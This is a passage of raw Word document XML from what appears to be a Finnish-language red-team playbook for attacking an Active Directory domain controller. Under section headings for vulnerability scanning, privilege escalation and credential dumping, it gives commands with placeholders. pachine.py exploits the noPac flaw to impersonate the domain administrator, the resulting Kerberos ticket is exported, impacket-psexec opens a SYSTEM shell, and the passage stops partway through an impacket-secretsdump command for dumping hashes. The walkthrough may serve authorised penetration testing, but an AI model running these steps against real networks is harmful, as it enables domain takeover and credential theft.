          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[dc-fqdn]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272562E0" w14:textId="753D25C1" w:rsidR="00165315" w:rsidRPr="00903EEA" w:rsidRDefault="00BB390F" w:rsidP="00BB390F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4FD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00903EEA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2559481B" w14:textId="4B36D122" w:rsidR="002727A6" w:rsidRPr="00903EEA" w:rsidRDefault="002727A6" w:rsidP="002727A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24AE919E" w14:textId="4E23CCA3" w:rsidR="0064551E" w:rsidRPr="00903EEA" w:rsidRDefault="0064551E" w:rsidP="002727A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc131534299"/>
      <w:r w:rsidRPr="00903EEA">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>BP - DC - Reconnaissance- Vulnerability Scanning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="4E6E7436" w14:textId="7E6D2423" w:rsidR="005E2B3C" w:rsidRPr="00903EEA" w:rsidRDefault="005E2B3C" w:rsidP="005E2B3C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C1061D4" w14:textId="3EE8C881" w:rsidR="005E2B3C" w:rsidRPr="00903EEA" w:rsidRDefault="005E2B3C" w:rsidP="005E2B3C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00903EEA">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Tarkistetaan onko kohde haavoittuva</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE7FB71" w14:textId="3AA5CDB5" w:rsidR="0064551E" w:rsidRPr="00903EEA" w:rsidRDefault="0064551E" w:rsidP="0064551E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05D16050" w14:textId="539FEE3E" w:rsidR="0064551E" w:rsidRPr="0064551E" w:rsidRDefault="0064551E" w:rsidP="0064551E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0064551E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 pachine.py -dc-host </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[dc fqdn]</w:t>
      </w:r>
      <w:r w:rsidRPr="0064551E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> -scan "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[domain]</w:t>
      </w:r>
      <w:r w:rsidRPr="0064551E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[user:pw]</w:t>
      </w:r>
      <w:r w:rsidRPr="0064551E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EC6829" w14:textId="4D649BCD" w:rsidR="0064551E" w:rsidRDefault="0064551E" w:rsidP="0064551E"/>
    <w:p w14:paraId="27B9D613" w14:textId="7E6E520F" w:rsidR="0064551E" w:rsidRPr="0064551E" w:rsidRDefault="0064551E" w:rsidP="0064551E">
      <w:r w:rsidRPr="0064551E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="694F0980" wp14:editId="052D7A19">
            <wp:extent cx="6073709" cy="82391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554" cy="8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49AB" w14:textId="77777777" w:rsidR="0064551E" w:rsidRPr="0064551E" w:rsidRDefault="0064551E" w:rsidP="0064551E"/>
    <w:p w14:paraId="0DAA77EE" w14:textId="1C56ABA5" w:rsidR="002727A6" w:rsidRDefault="002727A6" w:rsidP="002727A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc131534300"/>
      <w:r>
        <w:t>BP - DC - Privilege Escalation - Exploitation for Privilege Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="44038F90" w14:textId="3AA8BA35" w:rsidR="00610FAD" w:rsidRDefault="00610FAD" w:rsidP="00610FAD"/>
    <w:p w14:paraId="75FC548C" w14:textId="4500ADF7" w:rsidR="00610FAD" w:rsidRPr="00610FAD" w:rsidRDefault="00610FAD" w:rsidP="00610FAD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Hankitaan domain admin oikeudet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAB2B4B" w14:textId="77777777" w:rsidR="00610FAD" w:rsidRPr="00610FAD" w:rsidRDefault="00610FAD" w:rsidP="00610FAD"/>
    <w:p w14:paraId="3048A595" w14:textId="77777777" w:rsidR="008A2C0A" w:rsidRDefault="008A2C0A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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A2C0A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>python3 pachine.py -dc-host [dc-fqdn] -spn cifs/[domai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>n]</w:t>
      </w:r>
      <w:r w:rsidRPr="008A2C0A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -impersonate administrator '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[domain]</w:t>
      </w:r>
      <w:r w:rsidRPr="008A2C0A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[username]</w:t>
      </w:r>
      <w:r w:rsidRPr="008A2C0A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[pw]</w:t>
      </w:r>
      <w:r w:rsidRPr="008A2C0A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F865AA" w14:textId="77777777" w:rsidR="00F0705E" w:rsidRDefault="00F0705E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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089F4C30" w14:textId="77777777" w:rsidR="00277412" w:rsidRDefault="00F0705E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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F0705E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07E3148A" wp14:editId="6AFBD312">
            <wp:extent cx="6167654" cy="1295400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721" cy="12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9CBA" w14:textId="77777777" w:rsidR="00277412" w:rsidRDefault="00277412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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5136013A" w14:textId="08CA4FBB" w:rsidR="00277412" w:rsidRDefault="00277412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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00277412">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Otetaan käyttöön Kalilla domain a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>dminin kerberos tiketti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54617F24" w14:textId="3B57697C" w:rsidR="00502B8A" w:rsidRDefault="00502B8A" w:rsidP="6D9EE57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/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="237698FC" w14:textId="28891D95" w:rsidR="00502B8A" w:rsidRPr="00502B8A" w:rsidRDefault="00502B8A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theme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00502B8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">export </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="0031557F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="fi-FI"/>
          </w:rPr>
          <w:t>KRB5CCNAME=$PWD/administrator@rt.vle.fi.ccache</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="019C85D5" w14:textId="5E3CEF5F" w:rsidR="00B71E94" w:rsidRDefault="00502B8A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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F0D29AA" wp14:editId="7740B771">
            <wp:extent cx="5201655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88" cy="27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3057" w14:textId="77777777" w:rsidR="00502B8A" w:rsidRDefault="00502B8A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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36370EFF" w14:textId="134B3715" w:rsidR="004539BB" w:rsidRDefault="003957CD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/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1861FAC5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Seura</w:t>
      </w:r>
      <w:r w:rsidR="20B125AC" w:rsidRPr="1861FAC5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>av</w:t>
      </w:r>
      <w:r w:rsidRPr="1861FAC5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>aksi on mahdollista avata shelli domain adminin tunnuksilla</w:t>
      </w:r>
      <w:r w:rsidR="004539BB" w:rsidRPr="1861FAC5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>, jotka automaattisesti elevoituvat systeemi oikeuksiksi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0496CCE6" w14:textId="1D263322" w:rsidR="001E0AF6" w:rsidRDefault="001E0AF6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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8461A9" w14:textId="6F9AF04F" w:rsidR="00F13243" w:rsidRPr="00F13243" w:rsidRDefault="00F13243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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI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fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">Huom! </w:t>
      </w:r>
      <w:r w:rsidR="00E81DAF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Default principalin tulee olla oikein! Muuten yhteyden luominen ei onnistu.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093D1A9D" w14:textId="77777777" w:rsidR="00E631FE" w:rsidRPr="00C5129F" w:rsidRDefault="00E631FE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theme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0398A369" w14:textId="24090622" w:rsidR="00F13243" w:rsidRPr="00F13243" w:rsidRDefault="00F13243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theme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13243">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-psexec -k -no-pass </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[domain]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13243">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/administrator@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[domain]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFCCA52" w14:textId="77777777" w:rsidR="001E0AF6" w:rsidRPr="00F13243" w:rsidRDefault="001E0AF6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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00377B54" w14:textId="77777777" w:rsidR="00E32FB3" w:rsidRDefault="001E0AF6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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6095405F" wp14:editId="689CE0B6">
            <wp:extent cx="5100638" cy="354375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73" cy="35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7CD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6BDBE4" w14:textId="77777777" w:rsidR="00E32FB3" w:rsidRDefault="00E32FB3" w:rsidP="00DF3B6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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FA5DCB7" w14:textId="77777777" w:rsidR="00E32FB3" w:rsidRDefault="00E32FB3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fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellista poistutaan kirjoittamalla </w:t>
      </w:r>
      <w:r w:rsidRPr="00E32FB3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE43EC8" w14:textId="77777777" w:rsidR="00A86D6C" w:rsidRDefault="00A86D6C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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C0F792" w14:textId="61C727C9" w:rsidR="00D0223B" w:rsidRPr="008A2C0A" w:rsidRDefault="00A86D6C" w:rsidP="00DF3B61">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86D6C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="304E22D0" wp14:editId="536D91F6">
            <wp:extent cx="5408593" cy="1557338"/>
            <wp:effectExtent l="0" t="0" r="1905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316" cy="15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23B" w:rsidRPr="008A2C0A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D0223B" w:rsidRPr="008A2C0A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="473C6BBC" w14:textId="66DF7262" w:rsidR="0064551E" w:rsidRPr="008A2C0A" w:rsidRDefault="0064551E" w:rsidP="002727A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01E79A44" w14:textId="2D15CF49" w:rsidR="0064551E" w:rsidRPr="008A2C0A" w:rsidRDefault="0064551E" w:rsidP="002727A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38BE0049" w14:textId="77777777" w:rsidR="0064551E" w:rsidRPr="008A2C0A" w:rsidRDefault="0064551E" w:rsidP="002727A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7743891A" w14:textId="3735A9C1" w:rsidR="00A444BF" w:rsidRDefault="00A444BF" w:rsidP="00A444BF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc131534301"/>
      <w:r>
        <w:t>BP - DC - Credential Access - Credential Dumping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="20BE2170" w14:textId="391594BD" w:rsidR="00185042" w:rsidRDefault="00185042" w:rsidP="00185042"/>
    <w:p w14:paraId="0BF7E257" w14:textId="3BA768A3" w:rsidR="00185042" w:rsidRPr="00185042" w:rsidRDefault="00185042" w:rsidP="00185042">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00185042">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">Luo </w:t>
      </w:r>
      <w:r w:rsidR="004252F6">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>jokin kansio Kalille</w:t>
      </w:r>
      <w:r w:rsidRPr="00185042">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>, johon t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>unnukset ja hashit tallennetaan. Ei pakollista, mutta suositeltavaa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646A9AB6" w14:textId="5D6BB31C" w:rsidR="00C338CF" w:rsidRDefault="00C338CF" w:rsidP="009D2A25">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C32D17" w14:textId="284A3D0D" w:rsidR="00FD039B" w:rsidRPr="00FD039B" w:rsidRDefault="00FD039B" w:rsidP="009D2A25">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD039B">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Komento kysyy salasanaa. Salasanaksi k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>elpaa vaikka 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08567141" w14:textId="2CFFBB47" w:rsidR="00A444BF" w:rsidRPr="00FD039B" w:rsidRDefault="009D2A25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/>
          <w:color w:val="0D004C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD039B">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="0D004C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-secretsdump -k -outputfile </w:t>
      </w:r>
      <w:r w:rsidR="00421FF7">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD039B">
        <w:rPr>
